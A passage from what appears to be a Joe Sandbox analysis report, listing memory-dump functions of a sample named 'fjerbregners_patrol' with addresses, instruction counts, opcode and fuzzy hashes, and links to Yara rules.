                                                                                                                                                                                            • Opcode Fuzzy Hash: 54d17f16e73df959ade6801bfd14df47c5558d1bd833c14dc3138929320731b6
                                                                                                                                                                                            • Instruction Fuzzy Hash: A5513CB5A00619DFCB00CF58C880A5ABBF5FF09764B19869AF818DB351D335ED61CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2F63F Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d41e34828740d94d2696936eb21c2d1ce38db98d42508046bd13d634b352ecbb
                                                                                                                                                                                            • Instruction ID: d53dca9e0b591f5ff0cc962fdfc6dc429f779fffa030af55d223d594e0bbe9b8
                                                                                                                                                                                            • Opcode Fuzzy Hash: d41e34828740d94d2696936eb21c2d1ce38db98d42508046bd13d634b352ecbb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441A4B6D01719AFDB11DB988844AAFBBBCEF04A54F150666F904E7610DB35CE018BF0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DC3157 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                            • Instruction ID: 0d509a7b3d46794bbad496787a2fc63115e436cdd3e39005a5600dbd6e8ba4ef
                                                                                                                                                                                            • Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 72518BB1600746EFDB05CF54C580A46FBB9FF45704F1880AAE8089F612E775EA46CFA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CFD454 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 399c23df8ed3747974dd82e6823a9b9d90e05b545117f3d2a2bd39190d40c626
                                                                                                                                                                                            • Instruction ID: ec284f52fb1058e93551597e8f9e19c515096c3dd18d817e2e6a40f8c92be9fd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 399c23df8ed3747974dd82e6823a9b9d90e05b545117f3d2a2bd39190d40c626
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2851C1B6704B908FE712CF19C854B69B7E5EF40B90F4905A5F851CBAA4DB35DC40CB61
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE7A30 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ad6df4c8c3b66c1d2cee427b9a9227812efa66b2d59a910c9fa3037f1cf00fcf
                                                                                                                                                                                            • Instruction ID: af71de6aca092b32b405b62527d05ac62d19dc9cfe1cb2dfb215a918c7c8f74f
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad6df4c8c3b66c1d2cee427b9a9227812efa66b2d59a910c9fa3037f1cf00fcf
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B41B176A08312ABD320DF29C840B5BBBA4FF44790F150929F895DBA90EB34DD45CBE5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1D940 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 47becf8df4540a545a4f6697efc5915ff460037c75f68b320150fd84b99d9a95
                                                                                                                                                                                            • Instruction ID: 89263e03243f60d29e0c18639934172a791e10dd9e1c5bda37a2436842d33c80
                                                                                                                                                                                            • Opcode Fuzzy Hash: 47becf8df4540a545a4f6697efc5915ff460037c75f68b320150fd84b99d9a95
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9841D5B6D05754DFFB609E24D880B6FB3ACAB85B60F050729F8949F680D7749C448BE2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEB0D6 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a89bad3b1ec87ac0df97ebb5e42068a33566640d5922686e4e7df84b6afcb9e8
                                                                                                                                                                                            • Instruction ID: 346f7d47706be11b682f0d7d2556820ebca883f0a2200cc95f00f0ef1a8fe991
                                                                                                                                                                                            • Opcode Fuzzy Hash: a89bad3b1ec87ac0df97ebb5e42068a33566640d5922686e4e7df84b6afcb9e8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C41D5B5A46701EFE712DF65C840B16BBF8EF007A5F004469E552DBA60DB75D940CF60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1D600 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4130c4b7f948d5aa922b76a493c1a3054fe8f3fddf2d79d86a726f1cad31dd5d
                                                                                                                                                                                            • Instruction ID: d9ace211ae79dd4996e619660e89e895988e1f5ad57cdb4db7c74e6c643a4734
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4130c4b7f948d5aa922b76a493c1a3054fe8f3fddf2d79d86a726f1cad31dd5d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C41F776911300DFD760EF29D880F6B7BE9EB457A0F04062DF9559B690CB30E825CBA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2F523 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: db4de50e76bfc0d5c7b680aac8ba9fdf3065112ca0eca9b7f59b16a686a2c48d
                                                                                                                                                                                            • Instruction ID: 22392d9d5cc643f046fb140a51a5026b7deec46181081fa0a92e7188ea8910b5
                                                                                                                                                                                            • Opcode Fuzzy Hash: db4de50e76bfc0d5c7b680aac8ba9fdf3065112ca0eca9b7f59b16a686a2c48d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 07414BB5D0124C9FDB15CFA9C480AADBFF8BB48704F54466EE495E7241C7309905CFA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DBD7A7 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3ee98808e52d02f6606bca738bcda389741acf7f4a8ff727987e1e5e3a5ca449
                                                                                                                                                                                            • Instruction ID: 89e36f28273f490a08caa70732e6a21b02d300e48bbcceb55c5cb35a7ceff027
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ee98808e52d02f6606bca738bcda389741acf7f4a8ff727987e1e5e3a5ca449
                                                                                                                                                                                            • Instruction Fuzzy Hash: AA41D2B5A043018FDB15DF69C880B1BB7F5EBC4751F08452CE886C77A5DA34D845CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DBBA66 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9802a52c5be734150b46dee019044715e57c9964f15bef3638fddc9abaa6a550
                                                                                                                                                                                            • Instruction ID: 26c5a50dd65661bfb4eaae010a26daa48ba32fc7fe2cccb13338187ee40d4086
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9802a52c5be734150b46dee019044715e57c9964f15bef3638fddc9abaa6a550
                                                                                                                                                                                            • Instruction Fuzzy Hash: BE310676B00751BBDB128B68C855F5A7BF9EF44F90F084151E8878BB44DA74EC40C7A4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1FBC0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f9703848026246321df8ec5f370728d4b0ad803e4b63c0f69f4386cca0158f70
                                                                                                                                                                                            • Instruction ID: 04447cc372531e1f023513c2127066679caf865e06094044fb734d84951729e5
                                                                                                                                                                                            • Opcode Fuzzy Hash: f9703848026246321df8ec5f370728d4b0ad803e4b63c0f69f4386cca0158f70
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3041DE75E08B408FF760CF28E490B1677EABB44B64F084B59F8968F682DA38D491DB41
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D21796 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9a54936528838a495ab91e8169266a7e8b230dc1372534762d152126d4b37e42
                                                                                                                                                                                            • Instruction ID: 3351f532636fcad9eb7560c897412ed34f9f0ebb1fe157c67c8b73482e20eec6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a54936528838a495ab91e8169266a7e8b230dc1372534762d152126d4b37e42
                                                                                                                                                                                            • Instruction Fuzzy Hash: 814146B6E00355EFDB05CF58C880B99BBF1FB49708F55816AE8A9EB344C734A941CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF9AE4 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 07d2ae0dc479007ced3e2424a1046ae52837383099009e24cb394e94dbc3f913
                                                                                                                                                                                            • Instruction ID: a54a140758cb94b11c48cf9d7ce3d41777336ced6d9b5f881fcceac1b5865694
                                                                                                                                                                                            • Opcode Fuzzy Hash: 07d2ae0dc479007ced3e2424a1046ae52837383099009e24cb394e94dbc3f913
                                                                                                                                                                                            • Instruction Fuzzy Hash: D8413EB5A003288BEF64CF5AC898AA9F3F9AB44340F1101E9D809D7251EB71DE84CF60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D6FBC2 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fa459528399369b98aca547fb55cad356e7f5254e040b0aaadb170b2b50cd5d1
                                                                                                                                                                                            • Instruction ID: e48634652be7d6c4c12f6095f02e376f6ce7d7a60edc808e90e91c69d5d23b62
                                                                                                                                                                                            • Opcode Fuzzy Hash: fa459528399369b98aca547fb55cad356e7f5254e040b0aaadb170b2b50cd5d1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 754167B1D01608AFDB14CFA9D880BEEBBF8EF48714F54852AE925E7250DB709945CF60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE7BF0 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a80957235dc70b7023b5c3d9f4db03f19ce49e022199f0fccab069ac6b27827e
                                                                                                                                                                                            • Instruction ID: 2f1f59c0da5ed8a71c136bc2a9fe04cd1902e4b8f17e3e0eb0ab2c5bb48cf1ee
                                                                                                                                                                                            • Opcode Fuzzy Hash: a80957235dc70b7023b5c3d9f4db03f19ce49e022199f0fccab069ac6b27827e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A310531905B10EBD3369F28C841F16B7A9FF11BA2F154629F4A58B9A0DF20DD10CBE0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D19194 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: f5df6e384ae2ecf56058836f681ce310b87e1edf126570e158adfdf6d49170ef
                                                                                                                                                                                            • Instruction ID: 7ad82cdcbb1947009bcd53b73ffdf0f926f72c87f827bda35522ef98764e3717
                                                                                                                                                                                            • Opcode Fuzzy Hash: f5df6e384ae2ecf56058836f681ce310b87e1edf126570e158adfdf6d49170ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: 91319576E00328AFDBA18F64DC40F9AB7B9EF86710F5101D9A94DA7240DB309E55CFA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D15004 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                                                                                            • Instruction ID: e461638d74cd50d6c4b432cc249e4d6b73affdf4ca0de61dee6a658887ae5375
                                                                                                                                                                                            • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58315975F08301DFE750DEA8D410B16B7E6AB85B90F48856AF8C48B381C779C8A1C7E2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CED64A Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                                                                                                                            • Instruction ID: 1790b4670d23681587ac54921f9469c482d7784c0ce18629488e2f9179b7546f
                                                                                                                                                                                            • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                                                                                                                            • Instruction Fuzzy Hash: D631D57AA00704AFEB11DF44C9A8B5A73BDDF4475AF198829EC49DF244DA74DD40CB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DC17BC Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                                                                                            • Instruction ID: 5435179e771b3033f174c1c71742bcb3067a3d55628983fdd1d925c6f9b739f7
                                                                                                                                                                                            • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: F43170B2D10225EFC704DF69C880AADB7F1FF58315F19816AE854DB345D734AA51CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF91E5 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
